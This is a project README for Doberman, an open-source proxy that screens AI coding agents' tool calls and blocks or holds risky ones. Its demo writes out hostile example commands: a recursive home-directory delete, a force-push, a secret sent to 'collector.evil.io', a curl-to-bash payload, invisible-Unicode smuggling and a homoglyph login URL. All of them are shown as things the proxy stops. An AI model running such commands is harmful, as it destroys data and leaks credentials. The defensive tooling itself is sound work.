Adaptive authorization layer for coding agents (open core)
🐕 Doberman
Adaptive Authorization & Runtime Guardrails for AI Coding Agents
Doberman is an open-source AI agent security layer that intercepts every tool call your AI agent makes and returns PASS / AUTH / BLOCK — before anything executes.
If it isn't on the execution path, it's advisory, not protective.
AI coding agents (Claude Code, Cursor, Codex, Copilot agents, and any MCP-compatible agent) can read files, run shell commands, and call external APIs autonomously. Doberman sits between the agent and its tools as a transparent MCP proxy, turning every action into an explicit, auditable authorization decision.
AI agent ──▶ Doberman (MCP proxy) ──▶ real MCP tool servers
                │
                └─ normalize → risk engine → PASS / AUTH / BLOCK
Why Doberman?
Prompt injection, tool poisoning, data exfiltration, and runaway agents are the defining security problems of agentic AI. Most "AI guardrails" inspect prompts and offer advice. Doberman is different: it is on the tool-execution path, so a blocked action never runs.
Two non-negotiable properties:
- 🔒 Fail closed — any error, uncertainty, or unhandled case denies the action. There is no path to a tool around the decision engine.
- 📈 Raise-only learning — guardrails and adaptive learning can auto-tighten, never silently loosen. Every weakening requires explicit, 2FA-gated, audited human approval.
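The two properties above can be sketched in a few lines of Python. This is an illustration under stated assumptions, not Doberman's actual code: `Verdict`, `fail_closed`, and `raise_only` are hypothetical names, and the numeric limit stands in for any tunable guardrail where a lower value is stricter.

```python
from enum import Enum
from typing import Callable


class Verdict(Enum):
    PASS = "PASS"
    AUTH = "AUTH"
    BLOCK = "BLOCK"


def fail_closed(engine: Callable[[dict], Verdict], action: dict) -> Verdict:
    """Run a decision engine; any exception or non-Verdict result becomes BLOCK."""
    try:
        verdict = engine(action)
    except Exception:
        # Errors never fall through to the tool: deny instead.
        return Verdict.BLOCK
    # An unexpected return type counts as an unhandled case, so deny it too.
    return verdict if isinstance(verdict, Verdict) else Verdict.BLOCK


def raise_only(current_limit: int, proposed_limit: int,
               human_approved: bool = False) -> int:
    """Lower limits are stricter (assumption of this sketch).

    Tightening is applied automatically; loosening is ignored unless a
    human has explicitly approved it.
    """
    if proposed_limit <= current_limit or human_approved:
        return proposed_limit
    return current_limit
```

In this sketch, `raise_only(25, 10)` tightens the limit to 10, while `raise_only(25, 100)` leaves it at 25 until `human_approved=True` is passed. The 2FA and audit steps the real approval flow requires are out of scope here.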
See it in action
Three verdicts. One execution gate.
🔴 BLOCK — dangerous actions stopped before they reach the tool
# Your agent cleans up build artefacts and misjudges the target…
agent → run_terminal_cmd "rm -rf ~"
Doberman: BLOCK destructive_command
"Recursive force-delete of a home/root target."
# The command never reaches the shell.
# Your agent fetches a config token, then tries to phone it home…
agent → web_fetch "https://collector.evil.io" body="AWS_SECRET=AKIA..."
Doberman: BLOCK secret_exfiltration
"Credential pattern in request body to untrusted external destination."
# The request never leaves your machine. The secret is never echoed back to the agent.
# Your agent rewrites shared branch history…
agent → run_terminal_cmd "git push --force origin main"
Doberman: BLOCK force_push_protected_branch
"Force-push rewrites shared history on a protected branch."
# A poisoned tool result hides instructions in invisible Unicode, bound for an external API…
agent → http_post "https://api.notes.app/sync" body="<zero-width / tag-block smuggled text>"
Doberman: BLOCK smuggled_token_channel
"Hidden/invisible token-smuggling channel headed to an external destination."
# Invisible-Unicode smuggling (tag-block, bidi overrides, variation-selector byte
# channels) is caught deterministically; the decoded payload is never echoed back.
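To make the invisible-Unicode case concrete, here is a minimal sketch of a deterministic scan for the character classes named above. The function name, the range table, and the choice of ranges are assumptions for illustration; Doberman's own detector may cover more classes or treat legitimate uses (for example, U+FE0F after an emoji) differently.

```python
# Hypothetical range table: code point ranges for invisible characters
# that can carry hidden text. Not taken from Doberman's source.
INVISIBLE_RANGES = {
    "tag_block": [(0xE0000, 0xE007F)],
    "bidi_control": [(0x202A, 0x202E), (0x2066, 0x2069)],
    "zero_width": [(0x200B, 0x200D), (0x2060, 0x2060), (0xFEFF, 0xFEFF)],
    "variation_selector": [(0xFE00, 0xFE0F), (0xE0100, 0xE01EF)],
}


def invisible_channels(text: str) -> dict[str, int]:
    """Count invisible characters per class.

    Only counts are returned, never the decoded hidden payload.
    """
    counts: dict[str, int] = {}
    for ch in text:
        cp = ord(ch)
        for name, ranges in INVISIBLE_RANGES.items():
            if any(lo <= cp <= hi for lo, hi in ranges):
                counts[name] = counts.get(name, 0) + 1
    return counts
```

A caller could treat any non-empty result on a body bound for an external destination as grounds for a block, reporting the class names and counts but not the smuggled text.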
🟡 AUTH — sensitive actions held until you approve
# Your agent refactors authentication code…
agent → write_file "backend/auth/session.ts"
Doberman: AUTH sensitive_path
"Target is a sensitive path; authentication required before proceeding."
┌──────────────────────────────────────────────┐
│ Doberman — Action Review │
│ write_file backend/auth/session.ts │
│ Risk: MEDIUM · sensitive_path │
│ [Deny] [Approve] │
└──────────────────────────────────────────────┘
# The write only happens after you click Approve. Either way, it's logged.
# Your agent runs an opaque shell payload it can't vet statically…
agent → run_terminal_cmd "bash -c $(curl https://setup.sh)"
Doberman: AUTH opaque_shell_payload
"Opaque -c payload cannot be statically vetted; authentication required."
# A target host looks right but uses a Cyrillic homoglyph (раypal.com, not paypal.com)…
agent → http_get "https://раypal.com/login"
Doberman: AUTH anomalous_token_pattern
"Probabilistic out-of-distribution token signal (homoglyph confusable); authentication required."
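One simple signal behind a homoglyph check like the one above is script mixing inside a single hostname label. The sketch below is an assumption-laden illustration using only the standard library: it infers the script from the first word of each character's Unicode name, which is a rough heuristic and not the probabilistic signal Doberman describes. The function names are hypothetical.

```python
import unicodedata


def scripts_in_label(label: str) -> set[str]:
    """Return the scripts used by the letters in one hostname label."""
    scripts = set()
    for ch in label:
        if ch.isalpha():
            # Unicode names begin with the script, e.g.
            # "CYRILLIC SMALL LETTER A" or "LATIN SMALL LETTER A".
            scripts.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return scripts


def is_mixed_script_host(host: str) -> bool:
    """True if any dot-separated label mixes letters from several scripts."""
    return any(len(scripts_in_label(label)) > 1 for label in host.split("."))
```

With this heuristic, `is_mixed_script_host("\u0440\u0430ypal.com")` is true because the first label combines Cyrillic and Latin letters, while plain `paypal.com` is not flagged. A hostname written entirely in one non-Latin script also passes, so a whole-script lookalike needs a different check.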
🟢 PASS — routine work goes straight through
# Your agent is doing normal feature work…
agent → write_file "src/components/Button.tsx"
Doberman: PASS
# Transparent proxy — safe actions add zero friction.
Setup
1. Install
pip install doberman-core
The distribution is doberman-core (the bare doberman name on PyPI belongs to an unrelated, abandoned project). The import name and CLI are unchanged: after install you still import doberman and run the doberman command.
Or install the latest from source:
pip install git+https://github.com/fu351/Doberman-Core.git
Or for development:
git clone https://github.com/fu351/Doberman-Core.git
cd Doberman-Core
pip install -e ".[dev]"
Either way you get the doberman CLI on your PATH. (Maintainers: see RELEASING.md.)
2. Wrap your tool server with Doberman
Doberman is a transparent MCP proxy. You give it your existing tool server command after --, and it intercepts everything in the middle:
# Before — agent talks directly to your tool server:
npx -y @modelcontextprotocol/server-filesystem ~/my-project
# After — wrap it with Doberman:
doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
# ^^ the -- separator: everything after is your existing tool server command
To specify which repo's policy governs decisions (defaults to the current directory):
doberman serve --path ~/my-project -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
Doberman communicates over stdio — it spawns your tool server as a managed subprocess and speaks standard MCP. Your agent sees one server entry; the real tool server runs silently behind it.
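MCP messages are JSON-RPC 2.0, and tool invocations use the `tools/call` method with `name` and `arguments` parameters. The sketch below shows how a proxy on that path could gate a single message before forwarding it. It is not Doberman's implementation: `gate_message`, the `decide` callback, the error code choice, and the error text are all assumptions, and the AUTH approval flow is collapsed into a plain denial.

```python
import json
from typing import Callable, Optional

# Hypothetical sketch, not Doberman's real proxy code.
POLICY_DENIED = -32000  # JSON-RPC reserves -32000..-32099 for server-defined errors
PARSE_ERROR = -32700    # standard JSON-RPC parse error code


def _error(msg_id, code: int, message: str) -> str:
    return json.dumps({"jsonrpc": "2.0", "id": msg_id,
                       "error": {"code": code, "message": message}})


def gate_message(raw: str, decide: Callable[[str, dict], str]) -> Optional[str]:
    """Return None to forward `raw` downstream, or an error reply for the agent."""
    try:
        msg = json.loads(raw)
    except json.JSONDecodeError:
        return _error(None, PARSE_ERROR, "unparseable message")
    if not isinstance(msg, dict):
        return _error(None, POLICY_DENIED, "unsupported message shape")
    if msg.get("method") != "tools/call":
        return None  # this sketch only gates tool calls (e.g. tools/list passes)
    params = msg.get("params")
    if not isinstance(params, dict) or not isinstance(params.get("name"), str):
        return _error(msg.get("id"), POLICY_DENIED, "malformed tools/call")
    try:
        verdict = decide(params["name"], params.get("arguments") or {})
    except Exception:
        verdict = "BLOCK"  # fail closed on any engine error
    if verdict == "PASS":
        return None
    return _error(msg.get("id"), POLICY_DENIED, f"denied by policy: {verdict}")
```

The key design point is that the only way a `tools/call` message reaches the downstream server is a `None` return after an explicit PASS; every other branch produces a reply to the agent instead.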
3. Point your agent at Doberman
Replace your agent's existing MCP server entry with the Doberman-wrapped version.
Claude Code (CLI):
claude mcp add doberman -- doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
Claude Desktop (~/Library/Application Support/Claude/claude_desktop_config.json on Mac,
%APPDATA%\Claude\claude_desktop_config.json on Windows):
{
  "mcpServers": {
    "doberman": {
      "command": "doberman",
      "args": ["serve", "--",
               "npx", "-y", "@modelcontextprotocol/server-filesystem", "~/my-project"]
    }
  }
}
Cursor, Codex, or any MCP-compatible client — use the same mcpServers format in your client's MCP config file, substituting your own tool server command after --.
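If you have several existing server entries to convert, the rewrite is mechanical. The helper below is a hypothetical convenience script, not part of the doberman CLI: it takes one existing `mcpServers` entry and returns the wrapped form shown above, using only the `serve`, `--path`, and `--` arguments documented in this README. Extra keys such as `env` are not handled in this sketch.

```python
from typing import Optional


def wrap_with_doberman(entry: dict, policy_path: Optional[str] = None) -> dict:
    """Rewrite one mcpServers entry so the client launches it through Doberman.

    `entry` is an existing {"command": ..., "args": [...]} mapping.
    """
    args = ["serve"]
    if policy_path is not None:
        # Optional: choose which repo's policy governs decisions.
        args += ["--path", policy_path]
    # Everything after "--" is the original tool server command, unchanged.
    args += ["--", entry["command"], *entry.get("args", [])]
    return {"command": "doberman", "args": args}
```

For example, passing `{"command": "npx", "args": ["-y", "@modelcontextprotocol/server-filesystem", "~/my-project"]}` yields the same `command` and `args` as the Claude Desktop entry above.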
4. Scan (optional)
doberman scan # discover local MCP capabilities and build a risk map
Basic protection works out of the box. To change how readily step-up authentication is triggered, pick a strength mode (see "Tune to your risk tolerance").
Verify it end-to-end (real downstream, no fakes)
Two ways to watch Doberman front a real MCP server — no in-process test doubles anywhere in the chain.
Interactive demo — MCP Inspector + a real filesystem server:
npx -y @modelcontextprotocol/inspector doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
Open the Inspector UI and call tools through Doberman: routine reads and writes PASS straight through to the real filesystem server; a destructive call comes back as a policy error and never executes.
End-to-end test — in a dev checkout:
pytest tests/integration/test_serve_end_to_end.py -q
This spawns doberman serve as a real subprocess fronting a real stdio tool server (tests/fixtures/stdio_tool_server.py), connects to it with a real MCP client playing the agent, and asserts the deployable chain over actual stdio:
- the downstream's tools are re-exposed through the proxy,
- a PASS verdict reaches the tool (the downstream's call log records it), and
- a BLOCK verdict (rm -rf /) never reaches it: the call log stays empty.
That last assertion is the chokepoint property the whole project hangs on.
Note on the test fixtures: the rest of the integration suite deliberately uses an in-process fake downstream (tests/fixtures/fake_tool_server.py) that records every call it executes; recording is how the tests prove a blocked action reached nothing. It is a test fixture, not the runtime. doberman serve always spawns and talks to the real server you give it after --.
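The recording idea is easy to reproduce in miniature. The sketch below is not the project's fixture: `RecordingTool`, `mediated_call`, and `toy_decide` are hypothetical stand-ins that show why an empty call log is proof that a blocked action reached nothing.

```python
from typing import Callable


class RecordingTool:
    """Stand-in downstream tool that logs every command it actually executes."""

    def __init__(self) -> None:
        self.calls: list[str] = []

    def __call__(self, command: str) -> str:
        self.calls.append(command)
        return "ok"


def mediated_call(tool: Callable[[str], str], command: str,
                  decide: Callable[[str], str]) -> str:
    """Invoke the tool only on an explicit PASS; otherwise never touch it."""
    if decide(command) != "PASS":
        return "denied"
    return tool(command)


def toy_decide(command: str) -> str:
    # Deliberately naive rule, for the demonstration only.
    return "BLOCK" if command.startswith("rm -rf") else "PASS"
```

After `mediated_call(tool, "rm -rf /", toy_decide)` the tool's `calls` list is still empty, and after `mediated_call(tool, "ls", toy_decide)` it contains exactly `["ls"]`.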
Benchmark it (ASR / FPR)
A suite-agnostic harness scores Doberman as a filter over labeled actions and reports ASR (attack bypass rate) and FPR (benign over-block / friction). It runs the real decision engine over each labeled tool-call — Doberman is the filter, not the agent — so the gated path is deterministic and offline.
python -m tests.benchmarks.run --suite synthetic --profile both
It reports two profiles — builtins_only and with_plugins (built-ins plus any installed entry-point plugins) — and their uplift. A deterministic synthetic suite gates in CI; map external task suites (AgentDojo, AgentDyn, AgentSentry, …) onto core's types with a small adapter — see tests/benchmarks/README.md.
Reports hold counts, verdicts, and reason codes only, never payload text. ASR is reported alongside a stricter asr_strict (where only a hard BLOCK counts as mitigation): honest measurement, not a single headline number.
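As a worked illustration of the metrics, the sketch below scores a list of labeled outcomes. The exact definitions are assumptions inferred from the descriptions above, not read from the harness: ASR counts attacks that received PASS, asr_strict counts attacks that received anything other than BLOCK, and FPR counts benign actions that received anything other than PASS. `Outcome` and `score` are hypothetical names.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Outcome:
    is_attack: bool  # ground-truth label for the action
    verdict: str     # "PASS", "AUTH", or "BLOCK"


def _rate(hits: int, total: int) -> float:
    return hits / total if total else 0.0


def score(outcomes: list[Outcome]) -> dict[str, float]:
    """Compute ASR, asr_strict, and FPR under the assumed definitions."""
    attacks = [o for o in outcomes if o.is_attack]
    benign = [o for o in outcomes if not o.is_attack]
    return {
        # Attack went straight through.
        "asr": _rate(sum(o.verdict == "PASS" for o in attacks), len(attacks)),
        # Only a hard BLOCK counts as mitigation.
        "asr_strict": _rate(sum(o.verdict != "BLOCK" for o in attacks), len(attacks)),
        # Benign action met friction (AUTH) or was blocked.
        "fpr": _rate(sum(o.verdict != "PASS" for o in benign), len(benign)),
    }
```

With four attacks ending in BLOCK, BLOCK, AUTH, PASS and four benign actions ending in PASS, PASS, PASS, AUTH, this gives asr = 0.25, asr_strict = 0.5, and fpr = 0.25. The gap between the first two numbers is the share of attacks that depend on a human declining the AUTH prompt.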
Tune to your risk tolerance
Set a mode in .doberman/policies.yaml or via doberman policy set-mode <mode>:
| Mode | Best for | Bulk-delete threshold | Step-up for unknown destinations | Step-up for behavioral anomalies |
|---|---|---|---|---|
| Light | Exploratory / trusted environments | 100 files | Yes | No |
| Balanced (default) | Everyday coding agents | 25 files | Yes | Yes |
| Strict | Production repos, shared codebases | 10 files | Yes | Yes |
| Paranoid | Highly autonomous or security-critical agents | 3 files | Yes | Yes |
Hard blocks (secret exfiltration, destructive commands, role-boundary violations, smuggled-token-channel exfiltration) are identical in every mode. The mode dial only affects where step-up authentication is required for ambiguous or high-risk actions.
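The bulk-delete column of the table can be read as a simple lookup. The sketch below is illustrative only: the thresholds come from the table, but the function name, the lowercase mode keys, the inclusive comparison, and the choice of AUTH as the outcome above the threshold are assumptions rather than documented behavior.

```python
# Thresholds copied from the mode table; key spelling is an assumption.
BULK_DELETE_THRESHOLD = {
    "light": 100,
    "balanced": 25,
    "strict": 10,
    "paranoid": 3,
}


def bulk_delete_verdict(mode: str, files_deleted: int) -> str:
    """Return the verdict for a delete touching `files_deleted` files."""
    threshold = BULK_DELETE_THRESHOLD.get(mode.lower())
    if threshold is None:
        return "BLOCK"  # unknown mode: fail closed
    # Assumed inclusive: reaching the threshold triggers step-up authentication.
    return "AUTH" if files_deleted >= threshold else "PASS"
```

Under these assumptions a 25-file delete passes in Light mode but requires approval in Balanced, Strict, and Paranoid. Hard blocks are decided before any such lookup and do not depend on the mode.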
Who is this for?
- Developers running AI coding agents who want autonomous agents without rm -rf roulette.
- Security engineers evaluating AI agent security, MCP security, LLM tool-use sandboxing, and zero-trust architectures for agentic AI.
- Platform teams deploying agent fleets who need policy enforcement, audit logs, and human-in-the-loop approval for destructive actions.
Roadmap
- ✅ Tool mediation · decision engine · objective guardrail (paths, commands, destinations, secrets, smuggled-token channels) · subjective guardrail (adaptive behavioral baselines, OOD/homoglyph token signals) · roles & boundaries · capability discovery · tiered auth (confirm → TOTP → scoped elevation) · audit log · policy-drift & poisoning defense · universal subjective layer (SL1–SL9) · turn gate (pre-inference prompt-injection screening)
- ✅ Benchmark harness (suite-agnostic ASR/FPR over labeled actions; builtins_only vs with_plugins; deterministic synthetic gate; external-suite adapters via tests/benchmarks/)
- 📋 Cost observability (CostEvent meter + raise-only loop-anomaly detection)
- 📋 Enterprise platform: centralized control plane, dashboards, org policy, SSO/RBAC
License
Apache-2.0. The core is genuinely standalone — no proprietary dependency, ever (CI-enforced).
AI agent security · MCP security · MCP proxy · MCP firewall · AI guardrails · agentic AI safety · prompt injection defense · tool poisoning defense · LLM tool-use authorization · human-in-the-loop AI · AI agent sandbox · runtime AI security · zero trust for AI agents · Claude Code security · autonomous agent governance · data exfiltration prevention · adaptive anomaly detection · open source AI security